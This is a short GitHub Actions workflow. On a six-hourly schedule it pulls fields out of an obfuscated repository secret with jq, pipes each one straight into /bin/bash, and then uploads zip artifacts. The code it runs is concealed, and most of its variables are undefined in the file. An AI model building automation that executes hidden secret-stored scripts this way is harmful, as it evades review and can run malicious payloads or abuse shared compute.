name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '55 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          hqs243: ${{ secrets.hqs243 }}
        run: |
          printf '%s' "$hqs243" | jq -r .ucrd19503 | /bin/bash
          echo $cth5 | jq -r .sbamj72304 | /bin/bash
          echo $sw4 | jq -r .fhf71219 | /bin/bash
          printf '%s' "$fgv501" | jq -r .cor250 | /bin/bash
          echo $ac97 | jq -r .du8 | /bin/bash
          echo $fr36021 | jq -r .mhqeq16350 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: GyzJEhCp
          path: "*.zip"
          retention-days: 1
